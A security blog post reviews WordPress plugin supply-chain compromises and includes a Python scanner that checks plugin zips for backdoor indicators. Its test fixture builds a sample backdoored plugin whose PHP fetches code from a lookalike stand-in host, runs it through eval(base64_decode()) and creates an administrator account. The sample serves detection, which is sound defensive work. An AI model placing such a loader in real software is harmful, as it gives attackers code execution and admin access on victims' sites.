WordPress Supply Chain Attacks: When Trusted Sources Turn Malicious
Last July, Gravity Forms got compromised. Not a knockoff version from a sketchy download site. The official website. Millions of users trust this plugin. Anyone who manually downloaded it during a 48-hour window installed malware from the source they were supposed to trust.
This Is Not How It Is Supposed to Work
The standard security advice is simple: only download plugins from trusted sources. WordPress.org or the official vendor site. Check reviews. Look for active development. Avoid nulled plugins from random download sites.
Supply chain attacks bypass all of that. The source is trusted. The plugin is legitimate. The reviews are real. The problem is that somewhere between the developer and your website, someone inserted malicious code.
In the Gravity Forms case, attackers registered a lookalike domain and compromised the official download system. The malware exfiltrated site data, installed backdoors, and gave attackers the ability to create admin accounts and execute arbitrary code. A clean version was released within 48 hours, but anyone who downloaded during that window was infected.
Here is the uncomfortable detail: automatic updates through the WordPress dashboard were safe. Only manual downloads were affected. That distinction saved most users, but it also shows how narrow the margin can be.
It Keeps Happening
Two weeks before Gravity Forms, the same thing happened to Groundhogg. A marketing automation plugin. The official website was compromised. The GitHub repository stayed clean. Five confirmed downloads of the infected version, two installation attempts.
In 2024, attackers compromised five developer accounts on WordPress.org itself using passwords exposed in previous data breaches. Social Warfare, a plugin with over 30,000 active installs, was one of them. The injected code created rogue admin accounts, exfiltrated credentials, and injected malicious JavaScript into site footers. Roughly 35,000 sites may have been affected.
The AccessPress Themes attack in 2021 and 2022 hit 93 themes and plugins with over 360,000 active installations. Some sites had malware installed for nearly three years before anyone noticed.
What Most People Get Wrong
The assumption is that if you follow the rules, you are safe. Use official sources. Keep plugins updated. Be careful what you install. That works against most threats. It does not work against supply chain attacks.
What surprised me when I started tracking these incidents is how often password reuse is the root cause. The WordPress.org repository attack succeeded because developers reused passwords that had been exposed in previous breaches. If your WordPress.org password is the same as any password you have used elsewhere, you are vulnerable.
The other thing people miss is that manual downloads are inherently riskier than automatic updates. When you update through the WordPress dashboard, the package comes from the plugin's update API: WordPress.org for repository plugins, the vendor's own update server for commercial plugins like Gravity Forms. When you download a zip file directly from a vendor website and upload it yourself, you are trusting that website's security, and WordPress performs no signature check on the package you upload. That trust is not always warranted.
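Before a manually downloaded zip is ever uploaded, it can at least be triaged offline. The script below is an added example, not code from the original post or from ArmorPro: it opens a plugin zip without extracting it, scans every PHP file for the indicators a backdoored build typically carries (obfuscated string fed straight into eval, administrator creation, and calls to hosts the vendor's code is not known to contact), and reports them. The plugin name, the vendor host `updates.example-vendor.test`, the lookalike host `updates.example-vend0r.test`, and both zips are constructed for the example; the indicator list is a triage heuristic, not a definition of malware.

```python
import io
import re
import zipfile

# Indicators a tampered plugin build commonly carries: runtime code
# execution fed by an obfuscated string, and privileged user creation.
OBFUSCATED_EXEC = re.compile(
    r"\b(eval|assert|create_function)\s*\(\s*"
    r"(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(",
    re.IGNORECASE,
)
ADMIN_CREATION = re.compile(r"\b(wp_create_user|wp_insert_user)\s*\(", re.IGNORECASE)
SET_ADMIN_ROLE = re.compile(r"set_role\s*\(\s*['\"]administrator['\"]", re.IGNORECASE)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def scan_plugin_zip(zip_bytes: bytes, expected_hosts: set[str]) -> dict:
    """Inspect every PHP file inside a plugin zip (without extracting it).

    expected_hosts: hostnames the vendor's code is known to contact, such as
    its update or licence server. Any other host found in the code is reported.
    """
    findings = {"obfuscated_exec": [], "user_creation": [], "unexpected_hosts": {}}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(".php"):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            if OBFUSCATED_EXEC.search(text):
                findings["obfuscated_exec"].append(info.filename)
            if ADMIN_CREATION.search(text) or SET_ADMIN_ROLE.search(text):
                findings["user_creation"].append(info.filename)
            for host in URL_HOST.findall(text):
                host = host.lower()
                if host not in expected_hosts:
                    findings["unexpected_hosts"].setdefault(host, []).append(info.filename)
    return findings


def is_suspicious(findings: dict) -> bool:
    """True when any indicator category is non-empty."""
    return any(findings.values())


def build_zip(files: dict[str, str]) -> bytes:
    """Build an in-memory zip from {path: content}; used for constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed, hypothetical vendor: its genuine code only talks to this host.
EXPECTED_HOSTS = {"updates.example-vendor.test"}

# Constructed clean release.
CLEAN_PLUGIN = build_zip({
    "example-forms/example-forms.php": "<?php\n/* Plugin Name: Example Forms */\n"
        "$u = 'https://updates.example-vendor.test/check';\n",
    "example-forms/readme.txt": "== Example Forms ==\n",
})

# Constructed backdoored build: same plugin plus a loader that phones home to a
# lookalike host, evals what it receives, and creates an administrator.
BACKDOORED_PLUGIN = build_zip({
    "example-forms/example-forms.php": "<?php\n/* Plugin Name: Example Forms */\n"
        "$u = 'https://updates.example-vendor.test/check';\n"
        "include __DIR__ . '/common.php';\n",
    "example-forms/common.php": "<?php\n"
        "$c = wp_remote_get('https://updates.example-vend0r.test/api');\n"
        "eval(base64_decode($c['body']));\n"
        "$id = wp_create_user('support', 'p', 'x@example.invalid');\n"
        "(new WP_User($id))->set_role('administrator');\n",
    "example-forms/readme.txt": "== Example Forms ==\n",
})


def main() -> None:
    for label, blob in (("clean", CLEAN_PLUGIN), ("backdoored", BACKDOORED_PLUGIN)):
        f = scan_plugin_zip(blob, EXPECTED_HOSTS)
        print(f"{label}: {'SUSPICIOUS' if is_suspicious(f) else 'no indicators'} {f}")


if __name__ == "__main__":
    main()
```

Two caveats a practitioner should keep in mind. First, a scan like this catches the lazy case (a dropped loader, a new hostname) and misses a careful one, so it complements, rather than replaces, comparing the zip's hash against a release hash the vendor publishes through a second channel. Second, the allowlist of expected hosts has to be built from a known-good release, not from the zip under inspection, or a lookalike domain simply allowlists itself.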
The Fake Plugin Problem
Over 6,000 WordPress sites were compromised in 2024 with fake plugins that displayed fake browser update alerts. The malicious plugins used names designed to look legitimate. One was called Wordfense Security, one letter off from Wordfence. Close enough to fool someone scanning quickly.
Users who clicked the fake update prompts downloaded infostealers. The plugins were installed on legitimate sites, serving malware to unsuspecting visitors. Your site can become a distribution point without you knowing.
The Scale Is Growing
In 2024, nearly 8,000 new vulnerabilities were discovered in the WordPress ecosystem, a 34% increase over the previous year. 96% of them were in plugins. Every plugin you install is a potential entry point.
In the first week of this year, 333 new vulnerabilities were reported across 253 plugins and 80 themes. 236 of them remain unpatched. Every week looks like this now.
The sites that will fare best are the ones with the fewest plugins, the fastest update cycles, and actual visibility into what is happening on their servers. Supply chain attacks are not going away. They are becoming more common and more sophisticated.
The question is not whether you will be exposed to one. The question is whether you will notice when it happens. That is why we built activity logging into our security plugin. You cannot protect against everything, but you can know when something changes.